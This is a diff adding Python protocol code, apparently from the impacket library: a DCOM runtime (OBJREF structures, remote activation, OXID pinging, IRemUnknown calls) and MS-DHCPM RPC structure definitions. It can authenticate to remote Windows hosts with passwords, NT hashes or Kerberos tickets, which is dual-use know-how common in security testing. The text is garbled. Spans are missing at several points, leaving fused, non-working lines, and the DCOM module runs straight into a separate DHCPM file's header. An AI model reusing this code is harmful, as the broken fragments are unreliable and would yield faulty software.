+ ('std',STDOBJREF),
+ ('Signature1',ULONG),
+ ('saResAddr',DUALSTRINGARRAYPACKED),
+ ('nElms',ULONG),
+ ('Signature2',ULONG),
+ ('ElmArray',DATAELEMENT),
+ )
+ def __init__(self, data = None, isNDR64 = False):
+ OBJREF.__init__(self, data, isNDR64)
+ if data is None:
+ self['flags'] = FLAGS_OBJREF_EXTENDED
+ self['Signature1'] = 0x4E535956
+ self['Signature1'] = 0x4E535956
+ self['nElms'] = 0x4E535956
+
+# 2.2.19 DUALSTRINGARRAY
+class USHORT_ARRAY(NDRUniConformantArray):
+ item = ' 0 or len(deletedOids) > 0:
+ if 'setid' in DCOMConnection.OID_SET[target]:
+ setId = DCOMConnection.OID_SET[target]['setid']
+ else:
+ setId = 0
+ resp = objExporter.ComplexPing(setId, 0, addedOids, deletedOids)
+ DCOMConnection.OID_SET[target]['oids'] -= deletedOids
+ DCOMConnection.OID_SET[target]['oids'] |= addedOids
+ DCOMConnection.OID_SET[target]['setid'] = resp['pSetId']
+ else:
+ objExporter.SimplePing(DCOMConnection.OID_SET[target]['setid'])
+ except Exception as e:
+ # There might be exceptions when sending packets
+ # We should try to continue tho.
+ LOG.error(str(e))
+ pass
+
+ DCOMConnection.PINGTIMER = Timer(120,DCOMConnection.pingServer)
+ try:
+ DCOMConnection.PINGTIMER.start()
+ except Exception as e:
+ if str(e).find('threads can only be started once') < 0:
+ raise e
+
+ def initTimer(self):
+ if self.__oxidResolver is True:
+ if DCOMConnection.PINGTIMER is None:
+ DCOMConnection.PINGTIMER = Timer(120, DCOMConnection.pingServer)
+ try:
+ DCOMConnection.PINGTIMER.start()
+ except Exception as e:
+ if str(e).find('threads can only be started once') < 0:
+ raise e
+
+ def initConnection(self):
+ stringBinding = r'ncacn_ip_tcp:%s' % self.__target
+ rpctransport = transport.DCERPCTransportFactory(stringBinding)
+
+ if hasattr(rpctransport, 'set_credentials') and len(self.__userName) >=0:
+ # This method exists only for selected protocol sequences.
+ rpctransport.set_credentials(self.__userName, self.__password, self.__domain, self.__lmhash, self.__nthash,
+ self.__aesKey, self.__TGT, self.__TGS)
+ rpctransport.set_kerberos(self.__doKerberos, self.__kdcHost)
+ self.__portmap = rpctransport.get_dce_rpc()
+ self.__portmap.set_auth_level(self.__authLevel)
+ if self.__doKerberos is True:
+ self.__portmap.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
+ self.__portmap.connect()
+ DCOMConnection.PORTMAPS[self.__target] = self.__portmap
+
+ def CoCreateInstanceEx(self, clsid, iid):
+ scm = IRemoteSCMActivator(self.__portmap)
+ iInterface = scm.RemoteCreateInstance(clsid, iid)
+ self.initTimer()
+ return iInterface
+
+ def get_dce_rpc(self):
+ return DCOMConnection.PORTMAPS[self.__target]
+
+ def disconnect(self):
+ if DCOMConnection.PINGTIMER is not None:
+ del(DCOMConnection.PORTMAPS[self.__target])
+ del(DCOMConnection.OID_SET[self.__target])
+ if len(DCOMConnection.PORTMAPS) == 0:
+ # This means there are no more clients using this object, kill it
+ DCOMConnection.PINGTIMER.cancel()
+ DCOMConnection.PINGTIMER.join()
+ DCOMConnection.PINGTIMER = None
+ if self.__target in INTERFACE.CONNECTIONS:
+ del(INTERFACE.CONNECTIONS[self.__target][currentThread().getName()])
+ self.__portmap.disconnect()
+ #print INTERFACE.CONNECTIONS
+
+class CLASS_INSTANCE:
+ def __init__(self, ORPCthis, stringBinding):
+ self.__stringBindings = stringBinding
+ self.__ORPCthis = ORPCthis
+ self.__authType = RPC_C_AUTHN_WINNT
+ self.__authLevel = RPC_C_AUTHN_LEVEL_PKT_PRIVACY
+ def get_ORPCthis(self):
+ return self.__ORPCthis
+ def get_string_bindings(self):
+ return self.__stringBindings
+ def get_auth_level(self):
+ if RPC_C_AUTHN_LEVEL_NONE < self.__authLevel < RPC_C_AUTHN_LEVEL_PKT_PRIVACY:
+ if self.__authType == RPC_C_AUTHN_WINNT:
+ return RPC_C_AUTHN_LEVEL_PKT_INTEGRITY
+ else:
+ return RPC_C_AUTHN_LEVEL_PKT_PRIVACY
+ return self.__authLevel
+ def set_auth_level(self, level):
+ self.__authLevel = level
+ def get_auth_type(self):
+ return self.__authType
+ def set_auth_type(self, authType):
+ self.__authType = authType
+
+
+class INTERFACE:
+ # class variable holding the transport connections, organized by target IP
+ CONNECTIONS = {}
+
+ def __init__(self, cinstance=None, objRef=None, ipidRemUnknown=None, iPid=None, oxid=None, oid=None, target=None,
+ interfaceInstance=None):
+ if interfaceInstance is not None:
+ self.__target = interfaceInstance.get_target()
+ self.__iPid = interfaceInstance.get_iPid()
+ self.__oid = interfaceInstance.get_oid()
+ self.__oxid = interfaceInstance.get_oxid()
+ self.__cinstance = interfaceInstance.get_cinstance()
+ self.__objRef = interfaceInstance.get_objRef()
+ self.__ipidRemUnknown = interfaceInstance.get_ipidRemUnknown()
+ else:
+ if target is None:
+ raise Exception('No target')
+ self.__target = target
+ self.__iPid = iPid
+ self.__oid = oid
+ self.__oxid = oxid
+ self.__cinstance = cinstance
+ self.__objRef = objRef
+ self.__ipidRemUnknown = ipidRemUnknown
+ # We gotta check if we have a container inside our connection list, if not, create
+ if (self.__target in INTERFACE.CONNECTIONS) is not True:
+ INTERFACE.CONNECTIONS[self.__target] = {}
+ INTERFACE.CONNECTIONS[self.__target][currentThread().getName()] = {}
+
+ if objRef is not None:
+ self.process_interface(objRef)
+
+ def process_interface(self, data):
+ objRefType = OBJREF(data)['flags']
+ objRef = None
+ if objRefType == FLAGS_OBJREF_CUSTOM:
+ objRef = OBJREF_CUSTOM(data)
+ elif objRefType == FLAGS_OBJREF_HANDLER:
+ objRef = OBJREF_HANDLER(data)
+ elif objRefType == FLAGS_OBJREF_STANDARD:
+ objRef = OBJREF_STANDARD(data)
+ elif objRefType == FLAGS_OBJREF_EXTENDED:
+ objRef = OBJREF_EXTENDED(data)
+ else:
+ LOG.error("Unknown OBJREF Type! 0x%x" % objRefType)
+
+ if objRefType != FLAGS_OBJREF_CUSTOM:
+ if objRef['std']['flags'] & SORF_NOPING == 0:
+ DCOMConnection.addOid(self.__target, objRef['std']['oid'])
+ self.__iPid = objRef['std']['ipid']
+ self.__oid = objRef['std']['oid']
+ self.__oxid = objRef['std']['oxid']
+ if self.__oxid is None:
+ objRef.dump()
+ raise Exception('OXID is None')
+
+ def get_oxid(self):
+ return self.__oxid
+
+ def set_oxid(self, oxid):
+ self.__oxid = oxid
+
+ def get_oid(self):
+ return self.__oid
+
+ def set_oid(self, oid):
+ self.__oid = oid
+
+ def get_target(self):
+ return self.__target
+
+ def get_iPid(self):
+ return self.__iPid
+
+ def set_iPid(self, iPid):
+ self.__iPid = iPid
+
+ def get_objRef(self):
+ return self.__objRef
+
+ def set_objRef(self, objRef):
+ self.__objRef = objRef
+
+ def get_ipidRemUnknown(self):
+ return self.__ipidRemUnknown
+
+ def get_dce_rpc(self):
+ return INTERFACE.CONNECTIONS[self.__target][currentThread().getName()][self.__oxid]['dce']
+
+ def get_cinstance(self):
+ return self.__cinstance
+
+ def set_cinstance(self, cinstance):
+ self.__cinstance = cinstance
+
+ def is_fdqn(self):
+ # I will assume the following
+ # If I can't socket.inet_aton() then it's not an IPv4 address
+ # Same for ipv6, but since socket.inet_pton is not available in Windows, I'll look for ':'. There can't be
+ # an FQDN with ':'
+ # Is it isn't both, then it is a FDQN
+ try:
+ socket.inet_aton(self.__target)
+ except:
+ # Not an IPv4
+ try:
+ self.__target.index(':')
+ except:
+ # Not an IPv6, it's a FDQN
+ return True
+ return False
+
+
+ def connect(self, iid = None):
+ if (self.__target in INTERFACE.CONNECTIONS) is True:
+ if currentThread().getName() in INTERFACE.CONNECTIONS[self.__target] and \
+ (self.__oxid in INTERFACE.CONNECTIONS[self.__target][currentThread().getName()]) is True:
+ dce = INTERFACE.CONNECTIONS[self.__target][currentThread().getName()][self.__oxid]['dce']
+ currentBinding = INTERFACE.CONNECTIONS[self.__target][currentThread().getName()][self.__oxid]['currentBinding']
+ if currentBinding == iid:
+ # We don't need to alter_ctx
+ pass
+ else:
+ newDce = dce.alter_ctx(iid)
+ INTERFACE.CONNECTIONS[self.__target][currentThread().getName()][self.__oxid]['dce'] = newDce
+ INTERFACE.CONNECTIONS[self.__target][currentThread().getName()][self.__oxid]['currentBinding'] = iid
+ else:
+ stringBindings = self.get_cinstance().get_string_bindings()
+ # No OXID present, we should create a new connection and store it
+ stringBinding = None
+ isTargetFDQN = self.is_fdqn()
+ LOG.debug('Target system is %s and isFDQN is %s' % (self.get_target(), isTargetFDQN))
+ for strBinding in stringBindings:
+ # Here, depending on the get_target() value several things can happen
+ # 1) it's an IPv4 address
+ # 2) it's an IPv6 address
+ # 3) it's a NetBios Name
+ # we should handle all this cases accordingly
+ # Does this match exactly what get_target() returns?
+ LOG.debug('StringBinding: %s' % strBinding['aNetworkAddr'])
+ if strBinding['wTowerId'] == 7:
+ # If there's port information, let's strip it for now.
+ if strBinding['aNetworkAddr'].find('[') >= 0:
+ binding, _, bindingPort = strBinding['aNetworkAddr'].partition('[')
+ bindingPort = '[' + bindingPort
+ else:
+ binding = strBinding['aNetworkAddr']
+ bindingPort = ''
+
+ if binding.upper().find(self.get_target().upper()) >= 0:
+ stringBinding = 'ncacn_ip_tcp:' + strBinding['aNetworkAddr'][:-1]
+ break
+ # If get_target() is a FQDN, does it match the hostname?
+ elif isTargetFDQN and binding.upper().find(self.get_target().upper().partition('.')[0]) >= 0:
+ # Here we replace the aNetworkAddr with self.get_target()
+ # This is to help resolving the target system name.
+ # self.get_target() has been resolved already otherwise we wouldn't be here whereas
+ # aNetworkAddr is usually the NetBIOS name and unless you have your DNS resolver
+ # with the right suffixes it will probably not resolve right.
+ stringBinding = 'ncacn_ip_tcp:%s%s' % (self.get_target(), bindingPort)
+ break
+
+ LOG.debug('StringBinding chosen: %s' % stringBinding)
+ if stringBinding is None:
+ # Something wen't wrong, let's just report it
+ raise Exception('Can\'t find a valid stringBinding to connect')
+
+ dcomInterface = transport.DCERPCTransportFactory(stringBinding)
+ if hasattr(dcomInterface, 'set_credentials'):
+ # This method exists only for selected protocol sequences.
+ dcomInterface.set_credentials(*DCOMConnection.PORTMAPS[self.__target].get_credentials())
+ dcomInterface.set_kerberos(DCOMConnection.PORTMAPS[self.__target].get_rpc_transport().get_kerberos(),
+ DCOMConnection.PORTMAPS[self.__target].get_rpc_transport().get_kdcHost())
+ dcomInterface.set_connect_timeout(300)
+ dce = dcomInterface.get_dce_rpc()
+
+ if iid is None:
+ raise Exception('IID is None')
+ else:
+ dce.set_auth_level(self.__cinstance.get_auth_level())
+ dce.set_auth_type(self.__cinstance.get_auth_type())
+
+ dce.connect()
+
+ if iid is None:
+ raise Exception('IID is None')
+ else:
+ dce.bind(iid)
+
+ if self.__oxid is None:
+ #import traceback
+ #traceback.print_stack()
+ raise Exception("OXID NONE, something wrong!!!")
+
+ INTERFACE.CONNECTIONS[self.__target][currentThread().getName()] = {}
+ INTERFACE.CONNECTIONS[self.__target][currentThread().getName()][self.__oxid] = {}
+ INTERFACE.CONNECTIONS[self.__target][currentThread().getName()][self.__oxid]['dce'] = dce
+ INTERFACE.CONNECTIONS[self.__target][currentThread().getName()][self.__oxid]['currentBinding'] = iid
+ else:
+ # No connection created
+ raise Exception('No connection created')
+
+ def request(self, req, iid = None, uuid = None):
+ req['ORPCthis'] = self.get_cinstance().get_ORPCthis()
+ req['ORPCthis']['flags'] = 0
+ self.connect(iid)
+ dce = self.get_dce_rpc()
+ try:
+ resp = dce.request(req, uuid)
+ except Exception as e:
+ if str(e).find('RPC_E_DISCONNECTED') >= 0:
+ msg = str(e) + '\n'
+ msg += "DCOM keep-alive pinging it might not be working as expected. You can't be idle for more than 14 minutes!\n"
+ msg += "You should exit the app and start again\n"
+ raise DCERPCException(msg)
+ else:
+ raise
+ return resp
+
+ def disconnect(self):
+ return INTERFACE.CONNECTIONS[self.__target][currentThread().getName()][self.__oxid]['dce'].disconnect()
+
+
+# 3.1.1.5.6.1 IRemUnknown Methods
+class IRemUnknown(INTERFACE):
+ def __init__(self, interface):
+ self._iid = IID_IRemUnknown
+ #INTERFACE.__init__(self, interface.get_cinstance(), interface.get_objRef(), interface.get_ipidRemUnknown(),
+ # interface.get_iPid(), target=interface.get_target())
+ INTERFACE.__init__(self, interfaceInstance=interface)
+ self.set_oxid(interface.get_oxid())
+
+ def RemQueryInterface(self, cRefs, iids):
+ # For now, it only supports a single IID
+ request = RemQueryInterface()
+ request['ORPCthis'] = self.get_cinstance().get_ORPCthis()
+ request['ORPCthis']['flags'] = 0
+ request['ripid'] = self.get_iPid()
+ request['cRefs'] = cRefs
+ request['cIids'] = len(iids)
+ for iid in iids:
+ _iid = IID()
+ _iid['Data'] = iid
+ request['iids'].append(_iid)
+ resp = self.request(request, IID_IRemUnknown, self.get_ipidRemUnknown())
+ #resp.dump()
+
+ return IRemUnknown2(
+ INTERFACE(self.get_cinstance(), None, self.get_ipidRemUnknown(), resp['ppQIResults']['std']['ipid'],
+ oxid=resp['ppQIResults']['std']['oxid'], oid=resp['ppQIResults']['std']['oxid'],
+ target=self.get_target()))
+
+ def RemAddRef(self):
+ request = RemAddRef()
+ request['ORPCthis'] = self.get_cinstance().get_ORPCthis()
+ request['ORPCthis']['flags'] = 0
+ request['cInterfaceRefs'] = 1
+ element = REMINTERFACEREF()
+ element['ipid'] = self.get_iPid()
+ element['cPublicRefs'] = 1
+ request['InterfaceRefs'].append(element)
+ resp = self.request(request, IID_IRemUnknown, self.get_ipidRemUnknown())
+ return resp
+
+ def RemRelease(self):
+ request = RemRelease()
+ request['ORPCthis'] = self.get_cinstance().get_ORPCthis()
+ request['ORPCthis']['flags'] = 0
+ request['cInterfaceRefs'] = 1
+ element = REMINTERFACEREF()
+ element['ipid'] = self.get_iPid()
+ element['cPublicRefs'] = 1
+ request['InterfaceRefs'].append(element)
+ resp = self.request(request, IID_IRemUnknown, self.get_ipidRemUnknown())
+ DCOMConnection.delOid(self.get_target(), self.get_oid())
+ return resp
+
+# 3.1.1.5.7 IRemUnknown2 Interface
+class IRemUnknown2(IRemUnknown):
+ def __init__(self, interface):
+ IRemUnknown.__init__(self, interface)
+ self._iid = IID_IRemUnknown2
+
+# 3.1.2.5.1 IObjectExporter Methods
+class IObjectExporter:
+ def __init__(self, dce):
+ self.__portmap = dce
+
+ # 3.1.2.5.1.1 IObjectExporter::ResolveOxid (Opnum 0)
+ def ResolveOxid(self, pOxid, arRequestedProtseqs):
+ self.__portmap.connect()
+ self.__portmap.bind(IID_IObjectExporter)
+ request = ResolveOxid()
+ request['pOxid'] = pOxid
+ request['cRequestedProtseqs'] = len(arRequestedProtseqs)
+ for protSeq in arRequestedProtseqs:
+ request['arRequestedProtseqs'].append(protSeq)
+ resp = self.__portmap.request(request)
+ Oxids = b''.join(pack(' 0:
+ for oid in addToSet:
+ oidn = OID()
+ oidn['Data'] = oid
+ request['AddToSet'].append(oidn)
+ else:
+ request['AddToSet'] = NULL
+
+ if len(delFromSet) > 0:
+ for oid in delFromSet:
+ oidn = OID()
+ oidn['Data'] = oid
+ request['DelFromSet'].append(oidn)
+ else:
+ request['DelFromSet'] = NULL
+ resp = self.__portmap.request(request)
+ return resp
+
+ # 3.1.2.5.1.4 IObjectExporter::ServerAlive (Opnum 3)
+ def ServerAlive(self):
+ self.__portmap.connect()
+ self.__portmap.bind(IID_IObjectExporter)
+ request = ServerAlive()
+ resp = self.__portmap.request(request)
+ return resp
+
+ # 3.1.2.5.1.5 IObjectExporter::ResolveOxid2 (Opnum 4)
+ def ResolveOxid2(self,pOxid, arRequestedProtseqs):
+ self.__portmap.connect()
+ self.__portmap.bind(IID_IObjectExporter)
+ request = ResolveOxid2()
+ request['pOxid'] = pOxid
+ request['cRequestedProtseqs'] = len(arRequestedProtseqs)
+ for protSeq in arRequestedProtseqs:
+ request['arRequestedProtseqs'].append(protSeq)
+ resp = self.__portmap.request(request)
+ Oxids = b''.join(pack('.
+# There are test cases for them too.
+#
+from __future__ import division
+from __future__ import print_function
+from impacket import system_errors
+from impacket.dcerpc.v5.dtypes import LPWSTR, ULONG, NULL, DWORD, BOOL, BYTE, LPDWORD, WORD
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRUniConformantArray, NDRPOINTER, NDRSTRUCT, NDRENUM, NDRUNION
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket.dcerpc.v5.enum import Enum
+from impacket.uuid import uuidtup_to_bin
+
+MSRPC_UUID_DHCPSRV = uuidtup_to_bin(('6BFFD098-A112-3610-9833-46C3F874532D', '1.0'))
+MSRPC_UUID_DHCPSRV2 = uuidtup_to_bin(('5B821720-F63B-11D0-AAD2-00C04FC324DB', '1.0'))
+
+
+class DCERPCSessionError(DCERPCException):
+ ERROR_MESSAGES = {
+ 0x00004E2D: ("ERROR_DHCP_JET_ERROR", "An error occurred while accessing the DHCP server database."),
+ 0x00004E25: ("ERROR_DHCP_SUBNET_NOT_PRESENT", "The specified IPv4 subnet does not exist."),
+ 0x00004E54: ("ERROR_DHCP_SUBNET_EXISTS", "The IPv4 scope parameters are incorrect. Either the IPv4 scope already"
+ " exists, corresponding to the SubnetAddress and SubnetMask members of "
+ "the structure DHCP_SUBNET_INFO (section 2.2.1.2.8), or there is a "
+ "range overlap of IPv4 addresses between those associated with the "
+ "SubnetAddress and SubnetMask fields of the new IPv4 scope and the "
+ "subnet address and mask of an already existing IPv4 scope"),
+
+ }
+ def __init__(self, error_string=None, error_code=None, packet=None):
+ DCERPCException.__init__(self, error_string, error_code, packet)
+
+ def __str__(self):
+ key = self.error_code
+ if key in system_errors.ERROR_MESSAGES:
+ error_msg_short = system_errors.ERROR_MESSAGES[key][0]
+ error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]
+ return 'DHCPM SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+ elif key in self.ERROR_MESSAGES:
+ error_msg_short = self.ERROR_MESSAGES[key][0]
+ error_msg_verbose = self.ERROR_MESSAGES[key][1]
+ return 'DHCPM SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+ else:
+ return 'DHCPM SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+DHCP_SRV_HANDLE = LPWSTR
+DHCP_IP_ADDRESS = DWORD
+DHCP_IP_MASK = DWORD
+DHCP_OPTION_ID = DWORD
+
+# DHCP enumeratiom flags
+DHCP_FLAGS_OPTION_DEFAULT = 0x00000000
+DHCP_FLAGS_OPTION_IS_VENDOR = 0x00000003
+
+# Errors
+ERROR_DHCP_JET_ERROR = 0x00004E2D
+ERROR_DHCP_SUBNET_NOT_PRESENT = 0x00004E25
+ERROR_DHCP_SUBNET_EXISTS = 0x00004E54
+################################################################################
+# STRUCTURES
+################################################################################
+# 2.2.1.1.3 DHCP_SEARCH_INFO_TYPE
+class DHCP_SEARCH_INFO_TYPE(NDRENUM):
+ class enumItems(Enum):
+ DhcpClientIpAddress = 0
+ DhcpClientHardwareAddress = 1
+ DhcpClientName = 2
+
+# 2.2.1.1.11 QuarantineStatus
+class QuarantineStatus(NDRENUM):
+ class enumItems(Enum):
+ NOQUARANTINE = 0
+ RESTRICTEDACCESS = 1
+ DROPPACKET = 2
+ PROBATION = 3
+ EXEMPT = 4
+ DEFAULTQUARSETTING = 5
+ NOQUARINFO = 6
+
+# 2.2.1.2.7 DHCP_HOST_INFO
+class DHCP_HOST_INFO(NDRSTRUCT):
+ structure = (
+ ('IpAddress', DHCP_IP_ADDRESS),
+ ('NetBiosName', LPWSTR),
+ ('HostName', LPWSTR),
+ )
+
+# 2.2.1.2.9 DHCP_BINARY_DATA
+class BYTE_ARRAY(NDRUniConformantArray):
+ item = 'c'
+
+class PBYTE_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', BYTE_ARRAY),
+ )
+
+class DHCP_BINARY_DATA(NDRSTRUCT):
+ structure = (
+ ('DataLength', DWORD),
+ ('Data_', PBYTE_ARRAY),
+ )
+
+DHCP_CLIENT_UID = DHCP_BINARY_DATA
+
+# 2.2.1.2.11 DATE_TIME
+class DATE_TIME(NDRSTRUCT):
+ structure = (
+ ('dwLowDateTime', DWORD),
+ ('dwHighDateTime', DWORD),
+ )
+
+# 2.2.1.2.19 DHCP_CLIENT_INFO_VQ
+class DHCP_CLIENT_INFO_VQ(NDRSTRUCT):
+ structure = (
+ ('ClientIpAddress', DHCP_IP_ADDRESS),
+ ('SubnetMask', DHCP_IP_MASK),
+ ('ClientHardwareAddress', DHCP_CLIENT_UID),
+ ('ClientName', LPWSTR),
+ ('ClientComment', LPWSTR),
+ ('ClientLeaseExpires', DATE_TIME),
+ ('OwnerHost', DHCP_HOST_INFO),
+ ('bClientType', BYTE),
+ ('AddressState', BYTE),
+ ('Status', QuarantineStatus),
+ ('ProbationEnds', DATE_TIME),
+ ('QuarantineCapable', BOOL),
+ )
+
+class DHCP_CLIENT_SEARCH_UNION(NDRUNION):
+ union = {
+ DHCP_SEARCH_INFO_TYPE.DhcpClientIpAddress: ('ClientIpAddress', DHCP_IP_ADDRESS),
+ DHCP_SEARCH_INFO_TYPE.DhcpClientHardwareAddress: ('ClientHardwareAddress', DHCP_CLIENT_UID),
+ DHCP_SEARCH_INFO_TYPE.DhcpClientName: ('ClientName', LPWSTR),
+ }
+
+class DHCP_SEARCH_INFO(NDRSTRUCT):
+ structure = (
+ ('SearchType', DHCP_SEARCH_INFO_TYPE),
+ ('SearchInfo', DHCP_CLIENT_SEARCH_UNION),
+ )
+
+# 2.2.1.2.14 DHCP_CLIENT_INFO_V4
+class DHCP_CLIENT_INFO_V4(NDRSTRUCT):
+ structure = (
+ ('ClientIpAddress', DHCP_IP_ADDRESS),
+ ('SubnetMask', DHCP_IP_MASK),
+ ('ClientHardwareAddress', DHCP_CLIENT_UID),
+ ('ClientName', LPWSTR),
+ ('ClientComment', LPWSTR),
+ ('ClientLeaseExpires', DATE_TIME),
+ ('OwnerHost', DHCP_HOST_INFO),
+ ('bClientType', BYTE),
+ )
+
+class DHCP_CLIENT_INFO_V5(NDRSTRUCT):
+ structure = (
+ ('ClientIpAddress', DHCP_IP_ADDRESS),
+ ('SubnetMask', DHCP_IP_MASK),
+ ('ClientHardwareAddress', DHCP_CLIENT_UID),
+ ('ClientName', LPWSTR),
+ ('ClientComment', LPWSTR),
+ ('ClientLeaseExpires', DATE_TIME),
+ ('OwnerHost', DHCP_HOST_INFO),
+ ('bClientType', BYTE),
+ ('AddressState', BYTE),
+ )
+
+class LPDHCP_CLIENT_INFO_V4(NDRPOINTER):
+ referent = (
+ ('Data', DHCP_CLIENT_INFO_V4),
+ )
+
+class LPDHCP_CLIENT_INFO_V5(NDRPOINTER):
+ referent = (
+ ('Data', DHCP_CLIENT_INFO_V5),
+ )
+
+# 2.2.1.2.115 DHCP_CLIENT_INFO_PB
+class DHCP_CLIENT_INFO_PB(NDRSTRUCT):
+ structure = (
+ ('ClientIpAddress', DHCP_IP_ADDRESS),
+ ('SubnetMask', DHCP_IP_MASK),
+ ('ClientHardwareAddress', DHCP_CLIENT_UID),
+ ('ClientName', LPWSTR),
+ ('ClientComment', LPWSTR),
+ ('ClientLeaseExpires', DATE_TIME),
+ ('OwnerHost', DHCP_HOST_INFO),
+ ('bClientType', BYTE),
+ ('AddressState', BYTE),
+ ('Status', QuarantineStatus),
+ ('ProbationEnds', DATE_TIME),
+ ('QuarantineCapable', BOOL),
+ ('FilterStatus', DWORD),
+ ('PolicyName', LPWSTR),
+ )
+
+class LPDHCP_CLIENT_INFO_PB(NDRPOINTER):
+ referent = (
+ ('Data', DHCP_CLIENT_INFO_PB),
+ )
+
+class LPDHCP_CLIENT_INFO_VQ(NDRPOINTER):
+ referent = (
+ ('Data', DHCP_CLIENT_INFO_VQ),
+ )
+
+class DHCP_CLIENT_INFO_VQ_ARRAY(NDRUniConformantArray):
+ item = LPDHCP_CLIENT_INFO_VQ
+
+class LPDHCP_CLIENT_INFO_VQ_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', DHCP_CLIENT_INFO_VQ_ARRAY),
+ )
+
+class DHCP_CLIENT_INFO_ARRAY_VQ(NDRSTRUCT):
+ structure = (
+ ('NumElements', DWORD),
+ ('Clients', LPDHCP_CLIENT_INFO_VQ_ARRAY),
+ )
+
+class LPDHCP_CLIENT_INFO_ARRAY_VQ(NDRPOINTER):
+ referent = (
+ ('Data', DHCP_CLIENT_INFO_ARRAY_VQ),
+ )
+
+class DHCP_CLIENT_INFO_V4_ARRAY(NDRUniConformantArray):
+ item = LPDHCP_CLIENT_INFO_V4
+
+class DHCP_CLIENT_INFO_V5_ARRAY(NDRUniConformantArray):
+ item = LPDHCP_CLIENT_INFO_V5
+
+class LPDHCP_CLIENT_INFO_V4_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', DHCP_CLIENT_INFO_V4_ARRAY),
+ )
+
+class LPDHCP_CLIENT_INFO_V5_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', DHCP_CLIENT_INFO_V5_ARRAY),
+ )
+
+class DHCP_CLIENT_INFO_ARRAY_V4(NDRSTRUCT):
+ structure = (
+ ('NumElements', DWORD),
+ ('Clients', LPDHCP_CLIENT_INFO_V4_ARRAY),
+ )
+
+class DHCP_CLIENT_INFO_ARRAY_V5(NDRSTRUCT):
+ structure = (
+ ('NumElements', DWORD),
+ ('Clients', LPDHCP_CLIENT_INFO_V4_ARRAY),
+ )
+
+class LPDHCP_CLIENT_INFO_ARRAY_V5(NDRPOINTER):
+ referent = (
+ ('Data', DHCP_CLIENT_INFO_ARRAY_V5),
+ )
+
+class LPDHCP_CLIENT_INFO_ARRAY_V4(NDRPOINTER):
+ referent = (
+ ('Data', DHCP_CLIENT_INFO_ARRAY_V4),
+ )
+
+class DHCP_IP_ADDRESS_ARRAY(NDRUniConformantArray):
+ item = DHCP_IP_ADDRESS
+
+class LPDHCP_IP_ADDRESS_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', DHCP_IP_ADDRESS_ARRAY),
+ )
+
+class DHCP_IP_ARRAY(NDRSTRUCT):
+ structure = (
+ ('NumElements', DWORD),
+ ('Elements', LPDHCP_IP_ADDRESS_ARRAY),
+ )
+
+class DHCP_SUBNET_STATE(NDRENUM):
+ class enumItems(Enum):
+ DhcpSubnetEnabled = 0
+ DhcpSubnetDisabled = 1
+ DhcpSubnetEnabledSwitched = 2
+ DhcpSubnetDisabledSwitched = 3
+ DhcpSubnetInvalidState = 4
+
+class DHCP_SUBNET_INFO(NDRSTRUCT):
+ structure = (
+ ('SubnetAddress', DHCP_IP_ADDRESS),
+ ('SubnetMask', DHCP_IP_MASK),
+ ('SubnetName', LPWSTR),
+ ('SubnetComment', LPWSTR),
+ ('PrimaryHost', DHCP_HOST_INFO),
+ ('SubnetState', DHCP_SUBNET_STATE),
+ )
+
+class LPDHCP_SUBNET_INFO(NDRPOINTER):
+ referent = (
+ ('Data', DHCP_SUBNET_INFO),
+ )
+
+class DHCP_OPTION_SCOPE_TYPE(NDRENUM):
+ class enumItems(Enum):
+ DhcpDefaultOptions = 0
+ DhcpGlobalOptions = 1
+ DhcpSubnetOptions = 2
+ DhcpReservedOptions = 3
+ DhcpMScopeOptions = 4
+
+class DHCP_RESERVED_SCOPE(NDRSTRUCT):
+ structure = (
+ ('ReservedIpAddress', DHCP_IP_ADDRESS),
+ ('ReservedIpSubnetAddress', DHCP_IP_ADDRESS),
+ )
+
+class DHCP_OPTION_SCOPE_UNION(NDRUNION):
+ union = {
+ DHCP_OPTION_SCOPE_TYPE.DhcpDefaultOptions : (),
+ DHCP_OPTION_SCOPE_TYPE.DhcpGlobalOptions : (),
+ DHCP_OPTION_SCOPE_TYPE.DhcpSubnetOptions : ('SubnetScopeInfo', DHCP_IP_ADDRESS),
+ DHCP_OPTION_SCOPE_TYPE.DhcpReservedOptions : ('ReservedScopeInfo', DHCP_RESERVED_SCOPE),
+ DHCP_OPTION_SCOPE_TYPE.DhcpMScopeOptions : ('MScopeInfo', LPWSTR),
+ }
+
+class DHCP_OPTION_SCOPE_INFO(NDRSTRUCT):
+ structure = (
+ ('ScopeType', DHCP_OPTION_SCOPE_TYPE),
+ ('ScopeInfo', DHCP_OPTION_SCOPE_UNION),
+ )
+
+class LPDHCP_OPTION_SCOPE_INFO(NDRPOINTER):
+ referent = (
+ ('Data', DHCP_OPTION_SCOPE_INFO)
+ )
+
+class DWORD_DWORD(NDRSTRUCT):
+ structure = (
+ ('DWord1', DWORD),
+ ('DWord2', DWORD),
+ )
+
+class DHCP_BOOTP_IP_RANGE(NDRSTRUCT):
+ structure = (
+ ('StartAddress', DHCP_IP_ADDRESS),
+ ('EndAddress', DHCP_IP_ADDRESS),
+ ('BootpAllocated', ULONG),
+ ('MaxBootpAllowed', DHCP_IP_ADDRESS),
+ ('MaxBootpAllowed', ULONG ),
+ )
+
+class DHCP_IP_RESERVATION_V4(NDRSTRUCT):
+ structure = (
+ ('ReservedIpAddress', DHCP_IP_ADDRESS),
+ ('ReservedForClient', DHCP_CLIENT_UID),
+ ('bAllowedClientTypes', BYTE),
+ )
+
+class DHCP_IP_RANGE(NDRSTRUCT):
+ structure = (
+ ('StartAddress', DHCP_IP_ADDRESS),
+ ('EndAddress', DHCP_IP_ADDRESS),
+ )
+
+class DHCP_IP_CLUSTER(NDRSTRUCT):
+ structure = (
+ ('ClusterAddress', DHCP_IP_ADDRESS),
+ ('ClusterMask', DWORD),
+ )
+
+class DHCP_SUBNET_ELEMENT_TYPE(NDRENUM):
+ class enumItems(Enum):
+ DhcpIpRanges = 0
+ DhcpSecondaryHosts = 1
+ DhcpReservedIps = 2
